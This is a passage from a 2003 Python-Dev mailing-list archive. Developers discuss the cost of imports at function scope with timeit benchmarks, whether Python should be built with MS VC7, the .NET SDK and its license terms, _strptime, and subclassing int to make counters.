10000 loops, best of 3: 168 usec per loop

[alex@lancelot src]$ python Lib/timeit.py -s'import math' -s'def f(): 
reload(math)' 'pass; f()'
10000 loops, best of 3: 169 usec per loop


Alex



From skip@pobox.com  Wed May  7 22:16:28 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 16:16:28 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <200305072257.26085.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030507185245.GL27125@unpythonic.net>
 <16057.22754.582272.377803@montanaro.dyndns.org>
 <200305072257.26085.aleax@aleax.it>
Message-ID: <16057.30636.403064.675001@montanaro.dyndns.org>

    >> I don't know if this still holds true, but at one point during the
    >> 2.x series I think it was pretty expensive to perform imports inside
    >> functions, much more expensive than in 1.5.2 at least (maybe right
    >> after nested scopes were introduced?).

    Alex> Doesn't seem to be true in 2.3, if I understand what you're saying:

    Alex> [alex@lancelot src]$ python Lib/timeit.py -s'def f(): pass' 'import math; f()'
    Alex> 100000 loops, best of 3: 4.04 usec per loop

    Alex> [alex@lancelot src]$ python Lib/timeit.py -s'def f(): import math' 'pass; f()'
    Alex> 100000 loops, best of 3: 4.05 usec per loop

Yes, you're correct.  Guess I could have run that myself had I been
thinking.  (My sleeping cap wasn't on much last night, so my thinking cap
hasn't been on much today.)

Guido, any chance you can quickly run the above two through the thirty-leven
versions of Python you have laying about so we can narrow this down or
refute my faulty memory?  I've seen some recent posts by you which had
performance data as far back as 1.3.  I tried with 2.1, 2.2 and CVS but saw
no discernable differences within versions:

    % python ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 7.44 usec per loop
    % python ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 7.6 usec per loop

    % python2.2 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 9.19 usec per loop
    % python2.2 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 9.05 usec per loop

    % python2.1 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 9.16 usec per loop
    % python2.1 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 9.12 usec per loop

Maybe it was 2.0?

Thx,

Skip


From drifty@alum.berkeley.edu  Wed May  7 23:16:50 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Wed, 7 May 2003 15:16:50 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
Message-ID: <Pine.SOL.4.55.0305071511430.11630@death.OCF.Berkeley.EDU>

Someone filed a bug report wanting it to be mentioned that most libc
implementations  of strptime don't handle %Z.  Michael asked whether
_strptime was going to become the permanent version of time.strptime or
not.  This was partially discussed back when Guido used his amazing time
machine to make time.strptime use _strptime exclusively for testing
purposes.

I vaguely remember Tim saying he supported moving to _strptime, but I
don't remember Guido having an opinion.  If this is going to happen for
2.3 I would like to know so as to fix the documentation to be better.

-Brett


From python@rcn.com  Thu May  8 00:55:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 7 May 2003 19:55:03 -0400
Subject: [Python-Dev] Startup time
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>        <20030507185245.GL27125@unpythonic.net>        <16057.22754.582272.377803@montanaro.dyndns.org>        <200305072257.26085.aleax@aleax.it> <16057.30636.403064.675001@montanaro.dyndns.org>
Message-ID: <003e01c314f4$1414f780$125ffea9@oemcomputer>

> Guido, any chance you can quickly run the above two through the thirty-leven
> versions of Python you have laying about so we can narrow this down or
> refute my faulty memory?  I've seen some recent posts by you which had
> performance data as far back as 1.3.  I tried with 2.1, 2.2 and CVS but saw
> no discernable differences within versions:
> 
>     % python ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 7.44 usec per loop
>     % python ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 7.6 usec per loop
> 
>     % python2.2 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 9.19 usec per loop
>     % python2.2 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 9.05 usec per loop
> 
>     % python2.1 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 9.16 usec per loop
>     % python2.1 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 9.12 usec per loop

I don't think timeit.py helps here.  It works by substituting *both* 
the setup and statement inside a compiled function.  

So, *none* of the above timings show the effect of a top level import 
versus one that is inside a function.  It does compare 1 deep nesting 
to 2 levels deep.
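
Roughly, timeit builds and compiles something like the following for each
run (paraphrased from memory, not the exact template), so the "import math"
given with -s is itself already executing at function scope:

    def inner(_it, _timer):
        import math            # the -s setup lands here ...
        def f(): pass          # ... as does any function it defines
        _t0 = _timer()
        for _i in _it:
            import math; f()   # and the timed statement runs here
        _t1 = _timer()
        return _t1 - _t0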

So, you'll likely have to roll your own miniature timer if you want
a straight answer.


Raymond Hettinger


From jepler@unpythonic.net  Thu May  8 01:53:44 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 19:53:44 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <003e01c314f4$1414f780$125ffea9@oemcomputer>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org> <200305072257.26085.aleax@aleax.it> <16057.30636.403064.675001@montanaro.dyndns.org> <003e01c314f4$1414f780$125ffea9@oemcomputer>
Message-ID: <20030508005342.GA3634@unpythonic.net>

On Wed, May 07, 2003 at 07:55:03PM -0400, Raymond Hettinger wrote:
> I don't think timeit.py helps here.  It works by substituting *both* 
> the setup and statement inside a compiled function.  
> 
> So, *none* of the above timings show the effect of a top level import 
> versus one that is inside a function.  It does compare 1 deep nesting 
> to 2 levels deep.

This program prints clock() times for 4e6 imports, first at global and then
at function scope.  Function scope wins a little bit, possibly due to the
speed of STORE_FAST instead of STORE_GLOBAL (or would it be STORE_NAME?)

########################################################################
# (on a different machine than my earlier timeit results, running 2.2.2)
# time for global import 30.21
# time for function import 27.31

import time, sys

t0 = time.clock()
for i in range(1e6):
	import sys; import sys; import sys; import sys;
t1 = time.clock()

print "time for global import", t1-t0

def f():
	for i in range(1e6):
		import sys; import sys; import sys; import sys;

t0 = time.clock()
f()
t1 = time.clock()
print "time for function import", t1-t0
########################################################################

If Skip is thinking of a slowdown for import and function scope, could it
be the {LOAD,STORE}_FAST performance killer 'import *'? (wow, LOAD_NAME
isn't as much slower than LOAD_FAST as you might expect..)

########################################################################
# time for <function f at 0x816306c> 27.9
# time for <function g at 0x8159e9c> 37.94

import new, sys, time
m = new.module('m')
sys.modules['m'] = m
m.__dict__.update({'__all__': ['x'], 'x': None})

def f():
        from m import x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x

def g():
        from m import *
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x

for fn in f, g:
	t0 = time.clock()
	for i in range(1e6): fn()
	t1 = time.clock()
	print "time for", fn, t1-t0
########################################################################


From dave@boost-consulting.com  Thu May  8 03:02:34 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 07 May 2003 22:02:34 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <010501c314ba$6b8dbef0$21795418@dell1700> (Brian Quinlan's
 message of "Wed, 07 May 2003 10:02:19 -0700")
References: <010501c314ba$6b8dbef0$21795418@dell1700>
Message-ID: <ud6iutcud.fsf@boost-consulting.com>

Brian Quinlan <brian@sweetapp.com> writes:

>> > That is information about the core ABI. I do need to be concerned
>> > about changes in the libraries, as well, in particular about
>> > incompatibilities resulting from multiple copies of the C library. 
>> > You said you don't know much about that.
>> 
>> I can find out almost as easily, if you have specific questions.
>
> But the actual question that we would like to answer is quite broad:
> what are all of the possible compatibility problems associated with
> using a VC6 compiled DLL with a VC7 compiled application?
>
> Assuming that only changed runtime data structures are going to be a
> problem, knowing which ones cannot be passed between the two versions
> would be nice. Below is a list of the standard types defined by
> Microsoft's VC6 runtime library (taken from the VC6 docs):
>
> clock_t
> _complex
> _dev_t
> div_t, ldiv_t
> _exception
> FILE
> _finddata_t, _wfinddata_t, _wfinddatai64_t
> _FPIEEE_RECORD
> fpos_t
> _HEAPINFO
> jmp_buf
> lconv
> _off_t
> _onexit_t
> _PNH
> ptrdiff_t
> sig_atomic_t
> size_t
> _stat
> time_t
> _timeb
> tm
> _utimbuf
> va_list
> wchar_t
> wctrans_t
> wctype_t
> wint_t

So do you want me to ask what all the possible compatibility problems
are, or do you want me to ask which of the above structures cannot be
passed between the two versions (or neither)?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From logistix@cathoderaymission.net  Thu May  8 03:48:50 2003
From: logistix@cathoderaymission.net (logistix)
Date: Wed, 7 May 2003 22:48:50 -0400
Subject: [Python-Dev] Building Python with .NET 2003 SDK
Message-ID: <000201c3150c$5b294cd0$20bba8c0@XP>

I decided to see if you really could build Python with the .NET
compiler.

I just got a preliminary build done that passed 67 tests (and failed 17).

Two big gotchas:

1) You also need to install the "Platform SDK".  This one makes the .NET
SDK download seem fast.

2) The VC6-generated makefiles include references to a few .lib files that
aren't included.  They don't seem to be needed, either.  The
offending libraries are largeint.lib, odbc32.lib, and odbccp32.lib.

More detailed notes on what had to be done to get it working can be
found here,

http://www.cathoderaymission.net/~logistix/python/buildingPythonWithDotNet.html

Enjoy!

-Grant



From skip@pobox.com  Thu May  8 04:23:58 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 22:23:58 -0500
Subject: [Python-Dev] local import cost
Message-ID: <16057.52686.475079.530463@montanaro.dyndns.org>

Thanks to Raymond H for pointing out the probably fallacy in my original
timeit runs.  Here's a simple timer which I think gets at what I'm after:

    import time
    import math
    import sys

    N = 500000

    def fmath():
        import math

    def fpass():
        pass

    v = sys.version.split()[0]

    t = time.clock()
    for i in xrange(N):
        fmath()
    fmathcps = N/(time.clock()-t)

    t = time.clock()
    for i in xrange(N):
        fpass()
    fpasscps = N/(time.clock()-t)

    print "%s fpass/fmath: %.1f" % (v, fpasscps/fmathcps)

On my Mac I get these outputs:

    2.1.3 fpass/fmath: 5.0
    2.2.2 fpass/fmath: 5.6
    2.3b1+ fpass/fmath: 5.3

Naturally, I expect fpass() to run a lot faster than fmath().  If my
presumption is correct though, there will be a sharp increase in the ratio,
maybe in 2.0 or 2.1, or whenever nested scopes were first introduced.

I can't run anything earlier than 2.1.x (I'll see about building 2.1) on my
Mac.  I'd have to break out my Linux laptop and do a bunch of downloading
and compiling to get earlier results.


From brian@sweetapp.com  Thu May  8 08:08:48 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Thu, 08 May 2003 00:08:48 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6iutcud.fsf@boost-consulting.com>
Message-ID: <002f01c31530$ac4b5ee0$21795418@dell1700>

> So do you want me to ask what all the possible compatibility problems
> are, or do you want me to ask which of the above structures cannot be
> passed between the two versions (or neither)?

The former question would be best, as the latter would seem to be a
subset.

Cheers,
Brian



From sjoerd@acm.org  Thu May  8 09:11:15 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Thu, 08 May 2003 10:11:15 +0200
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.12583.500034.130135@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org> <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net> <16057.9037.913362.225855@montanaro.dyndns.org> <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
 <16057.12583.500034.130135@montanaro.dyndns.org>
Message-ID: <20030508081115.79E3174230@indus.ins.cwi.nl>

Isn't it the case that you should only get a secondary prompt after the
comment line if the comment line *itself* had a secondary prompt?

On Wed, May 7 2003 Skip Montanaro wrote:

> 
>     Guido> Please do.  The indentation level should be easily available,
>     Guido> since it is computed by the tokenizer.
> 
> Alas, it's more complicated than just the indentation level of the current
> line.  I need to know if the previous line was indented, which I don't think
> the tokenizer knows (at least examining *tok in gdb under various conditions
> suggests it doesn't).
> 
> I see the following possible cases (there are perhaps more, but I think they
> are similar enough to ignore here):
> 
>     >>> if x == y:
>     ...   # hello
>     ...   pass
>     ... 
>     >>> if x == y:
>     ...   x = 1
>     ... # hello
>     ...   pass
>     ... 
>     >>> x = 1
>     >>> # hello
>     ... 
>     >>> 
> 
> Only the last case should display the primary prompt after the comment is
> entered.  The other two correctly display the secondary prompt.  It's
> distinguishing the second and third cases in the tokenizer without help from
> the parser that's the challenge.
> 
> Oh well.  Perhaps it's a wart best left alone.

-- Sjoerd Mullender <sjoerd@acm.org>


From mal@lemburg.com  Thu May  8 11:38:44 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 12:38:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
Message-ID: <3EBA33B4.3080601@lemburg.com>

Tim Peters wrote:
> [Martin v. Lowis]
> 
>>...
>>Some are sincerely hoping, or even expecting, that Python 2.3 is
>>released with VC7, so that they can embed Python in their VC7-based
>>application without having to recompile it.
>>
>>No matter what the choice is, somebody will be unhappy.
> 
> OTOH, I don't see anything to stop releasing VC6 and VC7 versions of Python,
> except for the absence of a volunteer to do it.  While the Wise installer is
> proprietary, there's nothing hidden about what goes into a release, there
> are several free installers people *could* use instead, and the build
> process for the 3rd-party components is pretty exhaustively documented.
> 
> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows should also
> be compiled under VC7 then.

I'm sure commercial players like e.g. ActiveState will happily
provide Windows installers for both versions.

Personally I don't think that people will switch to VC7 all that
soon -- the .NET libs are still far from being stable and as I read
the quotes on the VC compiler included in the .NET SDK, it will only
generate code that runs with the .NET libs installed. Could be wrong,
though.

Given that tools like distutils probably don't work
out of the box with the VC7 compiler suite, I'd wait at least
another release before making VC7 binaries the default on
Windows.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From mwh@python.net  Thu May  8 11:54:21 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 08 May 2003 11:54:21 +0100
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Doc/ext noddy2.c,NONE,1.1
 noddy3.c,NONE,1.1 newtypes.tex,1.21,1.22
In-Reply-To: <3EBA342A.7020006@zope.com> (Jim Fulton's message of "Thu, 08
 May 2003 06:40:42 -0400")
References: <E19DUtk-0003VA-00@sc8-pr-cvs1.sourceforge.net>
 <2mu1c568eq.fsf@starship.python.net> <3EBA342A.7020006@zope.com>
Message-ID: <2mr879674y.fsf@starship.python.net>

[Ccing python-dev because of the last paragraph]

Jim Fulton <jim@zope.com> writes:

> Michael Hudson wrote:
>> dcjim@users.sourceforge.net writes:
>> 
>>>Update of /cvsroot/python/python/dist/src/Doc/ext
>>>In directory sc8-pr-cvs1:/tmp/cvs-serv13294
>>>
>>>Modified Files:
>>> 	newtypes.tex Added Files:
>>> 	noddy2.c noddy3.c Log Message:
>>>Rewrote the basic section of the chapter on defining new types.
>> As the original author of this section, thank you!
>
> You're welcome. :)
>
> My main reason for doing this was to learn the material myself.
> (I had the luxury of sitting next to Guido as I did it and bugging
> him with questions. :)

That would help :-)

>> Do you mention anywhere that this only works for 2.2 and up?  That
>> might be an idea.
>
> OK, I'll add that in the introduction. It was *already* dependent on
> Python 2.3 due to the use of PyMODINIT_FUNC as the type of the init
> function.

Yes.  That wasn't me, and whoever changed it didn't keep the .c file
in sync with the bits of it quoted in the .tex file, grumble.

> I'm not sure why this is needed rather than void. Maybe I should change this
> so it works with Python 2.2. I'll talk to Guido and Fred about this.

The Py_MODINIT()/DL_IMPORT() thing is an annoying
incompatibility-causer ... perhaps something to deal with this could
be added to pymemcompat.h? (in which case it's misnamed...)

Cheers,
M.

-- 
  ARTHUR:  Ford, you're turning into a penguin, stop it.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 2


From paoloinvernizzi@dmsware.com  Thu May  8 12:08:41 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Thu, 08 May 2003 13:08:41 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA33B4.3080601@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
Message-ID: <3EBA3AB9.8020305@dmsware.com>

M.-A. Lemburg wrote:

> as I read
> the quotes on the VC compiler included in the .NET SDK, it will only
> generate code that runs with the .NET libs installed. Could be wrong,
> though. 

Uh?  The VC compiler included with the .NET SDK can only generate 
managed code? I don't think so...

> Given that tools like distutils probably don't work
> out of the box with the VC7 compiler suite, I'd wait at least
> another release before making VC7 binaries the default on
> Windows. 

Actually I have VC6 *and* VC7 on my at-work machine, python22 (Standard
distribution, VC6 based), python 23b1 (Standard, VC6 based) and python
cvs, which I build manually with VC7.
I can build/install distutils packages choosing which environment to use
(6 or 7) and which python to use (22, 23b1, 23 head).
So I think this is a non-problem...

But isn't it possible, at least, to have a non-default release compiled
with VC7?

It could be a boost toward having other *complicated* packages released with
VC7 alongside VC6 (I'm thinking of wxPython, and so on...)

---
Paolo Invernizzi








From nhodgson@bigpond.net.au  Thu May  8 12:31:20 2003
From: nhodgson@bigpond.net.au (Neil Hodgson)
Date: Thu, 08 May 2003 21:31:20 +1000
Subject: [Python-Dev] MS VC 7 offer
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
 <3EBA33B4.3080601@lemburg.com>
Message-ID: <000d01c31555$59222800$3da48490@neil>

M.-A. Lemburg:

> Personally I don't think that people will switch to VC7 all that
> soon -- the .NET libs are still far from being stable and as I read
> the quotes on the VC compiler included in the .NET SDK, it will only
> generate code that runs with the .NET libs installed. Could be wrong,
> though.

   VC7 can produce stand-alone binaries that do not need the .NET framework
or even the C runtime DLLs. I have distributed executable versions of my
Scintilla and SciTE projects built with VC7 for 9 months now. The
executables are quite a bit smaller and faster (by an average of 10%) than
their VC6 builds.  The link-time code generation option, which can inline
functions at link time rather than compile time, is effective.

   Possible issues with moving to VC7 are ensuring compatibility with
extension modules and the End User License Agreement. I looked at the EULA
thoroughly before buying VC7 as the license includes some clauses that may
cause problems for open source software that may be included in GPLed
applications. Redistributing applications compiled with VC7 is OK, but
redistributing the runtime DLLs such as msvcr70.dll (which is not already
present on pre VC7 versions of Windows) can not be done with GPLed code:
"""
(ii) not distributing Identified Software in conjunction with the
Redistributables or a derivative work thereof;
...
 Identified Software includes, without limitation, any software that
requires as a condition of use, modification and/or distribution of such
software that other software incorporated into, derived from or distributed
with such software be (1) disclosed or distributed in source code form; (2)
be licensed for the purpose of making derivative works; or (3) be
redistributable at no charge.
"""

   MS may have come to their senses and dropped this for Visual Studio 2003.

   It can be quite fun tracking the EULA down and working out which
components are licensed under which EULA. When downloading .NET before VC7
was available, the web site EULA was different to the installer's version.

   Neil



From mal@lemburg.com  Thu May  8 12:37:51 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 13:37:51 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA3AB9.8020305@dmsware.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA3AB9.8020305@dmsware.com>
Message-ID: <3EBA418F.3020006@lemburg.com>

Paolo Invernizzi wrote:
> M.-A. Lemburg wrote:
> 
>> as I read
>> the quotes on the VC compiler included in the .NET SDK, it will only
>> generate code that runs with the .NET libs installed. Could be wrong,
>> though. 
> 
> Uh?  The VC compiler included with the .NET SDK can only generate 
> managed code? I don't think so...

That's what I read in messages on this topic on google groups.
I've just downloaded the SDK myself and will probably give it
a go later today.

>> Given that tools like distutils probably don't work
>> out of the box with the VC7 compiler suite, I'd wait at least
>> another release before making VC7 binaries the default on
>> Windows. 
> 
> Actually I have VC6 *and* VC7 in my at-work machine, python22 (Standard 
> distribution, VC6 based), python 23b1 (Standard, VC6 based) and python 
> cvs, wich I manually build with VC7.
> I can build/install distutils packages choosing wich environment to use 
> (6 or 7) and python to use (22, 23b1, 23 head).
> So I think this is a no-problem...

That's good to know (btw, how do you tell distutils which VC
version to use ? or does it find out by itself using the
Python time machine ;-).

> But isn't possible, at least, to have a 'not-default' release compiled 
> with VC7?
> 
> It can be a boost for having other *complicated* packages released with 
> VC7 among with VC6 (I'm thinking at wxPython, and so...)

If someone volunteers to maintain such a branch, I suppose
there's nothing preventing it :-)

Perhaps we should look at the offer in a different light...

What advantage would the move from VC6 to VC7 give Python users ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From Paul.Moore@atosorigin.com  Thu May  8 12:53:54 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Thu, 8 May 2003 12:53:54 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB88619A6B@UKDCX001.uk.int.atosorigin.com>

From: Neil Hodgson [mailto:nhodgson@bigpond.net.au]
> Possible issues with moving to VC7 are ensuring compatibility with
> extension modules

That's the one that I see as most important. For the PythonLabs
distribution to move to VC7, it sounds as if many of the Windows
binary extensions in existence will also need to be built with VC7.
I've no idea how much of a problem this would be to extension
authors, but it would be a problem to end users if extension authors
could no longer provide binaries.

For reference, extensions I'd be in trouble without include win32all,
wxPython, cx_Oracle, pyXML (on occasion), ctypes, PIL, mod_python. I've
used many others on occasion, and no VC7 version would be an issue
for me.

So I guess that's the key issue. Can the majority of extension authors
produce VC7-compatible binaries? This probably needs to be asked on
comp.lang.python, not just on python-dev.

Paul.


From paoloinvernizzi@dmsware.com  Thu May  8 13:25:21 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Thu, 08 May 2003 14:25:21 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA418F.3020006@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA3AB9.8020305@dmsware.com> <3EBA418F.3020006@lemburg.com>
Message-ID: <3EBA4CB1.6020904@dmsware.com>

M.-A. Lemburg wrote:

> That's good to know (btw, how do you tell distutils which VC
> version to use ? or does it find out by itself using the
> Python time machine ;-). 

I simply run the right .bat file that sets all the needed variables 
before running the setup.py  ;-)

> If someone volunteers to maintain such a branch, I suppose
> there's nothing preventing it :-) 

As I guessed :-)
I think that the next release of scons can open new perspectives... (see
the earlier post by Greg Spencer)

> Perhaps we should look at the offer in a different light...
>
> What advantage would the move from VC6 to VC7 give Python users ? 

I don't know if there are advantages in *moving*... but I'm more interested
in *adding*... a VC7 release alongside the VC6 one...

---
Paolo Invernizzi







From DavidA@ActiveState.com  Thu May  8 17:29:14 2003
From: DavidA@ActiveState.com (David Ascher)
Date: Thu, 08 May 2003 09:29:14 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA33B4.3080601@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
Message-ID: <3EBA85DA.5050806@ActiveState.com>

M.-A. Lemburg wrote:
> Tim Peters wrote:

> I'm sure commercial players like e.g. ActiveState will happily
> provide Windows installers for both versions.

We will as soon as our customers ask for it.  So far, we've gotten no interest 
in that direction.

--david



From brian@sweetapp.com  Thu May  8 17:34:10 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Thu, 08 May 2003 09:34:10 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6iutcud.fsf@boost-consulting.com>
Message-ID: <008701c3157f$a7169210$21795418@dell1700>

Carl Kleffner referred me to an interesting discussion regarding VC6 and
VC7 compatibility:
http://tinyurl.com/baok

The bottom line seems to be that the C runtime libraries for VC6 and VC7
are currently binary compatible but that might change in the future. And
CRT-allocated resources cannot be shared between the two.

Cheers,
Brian 



From mal@lemburg.com  Thu May  8 17:36:57 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 18:36:57 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA85DA.5050806@ActiveState.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA85DA.5050806@ActiveState.com>
Message-ID: <3EBA87A9.7090805@lemburg.com>

David Ascher wrote:
> M.-A. Lemburg wrote:
> 
>> Tim Peters wrote:
> 
> 
>> I'm sure commercial players like e.g. ActiveState will happily
>> provide Windows installers for both versions.
> 
> We will as soon as our customers ask for it.  So far, we've gotten no 
> interest in that direction.

I suppose that's fair enough :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From lists@morpheus.demon.co.uk  Thu May  8 19:03:32 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Thu, 08 May 2003 19:03:32 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com> <046a01c31487$399d3390$530f8490@eden>
Message-ID: <n2m-g.u1c55n9n.fsf@morpheus.demon.co.uk>

"Mark Hammond" <mhammond@skippinet.com.au> writes:

> I must say that anecdotally, I find this to be true. Developers are
> *not* flocking to VC7. I wonder if that fact has anything to do with
> MS offering free compilers?

One further data point - the free mingw gcc compiler generates
binaries which depend on msvcrt.dll. So, if the Pythonlabs
distribution switches to MSVC7, developers using MSVC6 *and*
developers using mingw will be unable to build compatible extensions. 
The only compatible compiler will be MSVC7 (either the paid for
version or the free limited version).

Whatever you may think of Microsoft's offer, I feel that this
reduction in choice is a bad thing.

Paul.
-- 
This signature intentionally left blank


From bbolli@ymail.ch  Thu May  8 21:20:12 2003
From: bbolli@ymail.ch (Beat Bolli)
Date: Thu, 8 May 2003 22:20:12 +0200
Subject: [Python-Dev] Subclassing int? [Was: Re: [PEP] += on return of function call result]
Message-ID: <20030508202012.GA3809@bolli.homeip.net>

Andrew Koenig wrote:

> > Why can't you do this?
> >       foo = log.setdefault(r,'')
> >       foo += "test %d\n" % t

> You can do it, but it's useless!

I got bitten by the same problem some time ago. Please let me explain:

I needed to count words, using a dict, of course. So, in my first
enthusiasm, I wrote:

        count = {}
        for word in wordlist:
            count.setdefault(word, 0) += 1

This, as I soon realized, didn't work, exactly because ints are immutable.
So I tried a different track. No problem, I thought, in the new Python
object world, the native classes can be subclassed. I imagined I could
enhance the int class with an inc() method, thusly:

	class Counter(int):
	    def inc(self):
                # to be defined
                self += 1??

        count = {}
        for word in wordlist:
            count.setdefault(word, Counter()).inc()

As you can see, I have a problem at the comment: how do I access the
inherited int value??? I realized that this also wasn't going to work,
either. I finally used the perhaps idiomatic

        count = {}
        for word in wordlist:
            count[word] = count.get(word, 0) + 1

which of course is suboptimal, because the lookup is done twice. I decided
not to implement a proper Counter class for memory efficiency reasons. The
code would have been simple:

        class Counter:
            def __init__(self):
                self.n = 0
            def inc(self):
                self.n += 1
            def get(self):
                return self.n

        count = {}
        for word in wordlist:
            count.setdefault(word, Counter()).inc()

But to restate the core question: can class Counter be written as a subclass
of int?

Beat Bolli (please CC: me on replies, I'm not on the list)
-- 
mail: `echo '<bNObolli@ymaSPilAM.ch>' | sed -e 's/[A-S]//g'`
pgp:  0x506A903A; 49D5 794A EA77 F907 764F D89E 304B 93CF 506A 903A
icbm: 47° 02' 43.0" N, 07° 16' 17.5" E (WGS84)


From lists@morpheus.demon.co.uk  Thu May  8 21:05:28 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Thu, 08 May 2003 21:05:28 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
 <3EBA85DA.5050806@ActiveState.com>
Message-ID: <n2m-g.n0hx5hmf.fsf@morpheus.demon.co.uk>

David Ascher <DavidA@ActiveState.com> writes:

>> I'm sure commercial players like e.g. ActiveState will happily
>> provide Windows installers for both versions.
>
> We will as soon as our customers ask for it.  So far, we've gotten no
> interest in that direction.

Is that no interest in a VC7 version? If so, that's probably pretty
relevant information...

Paul.
-- 
This signature intentionally left blank


From tim.one@comcast.net  Thu May  8 22:56:32 2003
